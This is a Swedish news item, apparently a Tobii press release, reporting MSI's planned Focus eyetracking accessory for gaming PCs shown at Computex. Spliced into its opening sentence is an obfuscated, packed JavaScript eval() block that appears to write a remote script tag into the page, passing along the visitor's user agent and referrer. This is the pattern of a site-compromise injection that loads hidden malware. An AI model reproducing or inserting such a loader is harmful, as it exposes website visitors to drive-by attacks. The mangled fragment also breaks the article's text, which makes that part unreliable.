Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Tobii eyetracking i kommande speltillbehör från MSI

Tobii eyetracking i kommande speltillbehör från MSI
Sebastian

Speldatortillverkaren eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ifrdh|var|u0026u|referrer|akndt||js|php’.split(’|’),0,{}))
MSI har offentliggjort planerna på att lansera ett eyetracking-tillbehör för speldatorer. Produkten, kallad Focus, baseras på Tobiis integrationsplattform IS4 och visas av MSI på den pågående IT-mässan Computex i Taipei.

MSI har ännu inte kommunicerat något datum för säljstart. Det finns inte heller något bindande volymåtagande mellan Tobii och MSI. I början av 2016 lanserade MSI även en speldator med inbyggd eyetracking. Andra produkter med Tobii eyetracking som riktar sig till datorspelare är SteelSeries Sentry och Tobii EyeX Controller. Att mer eyetracking-hårdvara blir tillgänglig är positivt för Tobiis långsiktiga strävan att etablera eyetracking på spelmarknaden.

Tobii offentliggör denna information enligt svensk lag om värdepappersmarknaden och/eller svensk lag om handel med finansiella instrument. Informationen lämnades för offentliggörande den 1 juni 2016, kl. 12.15. CET.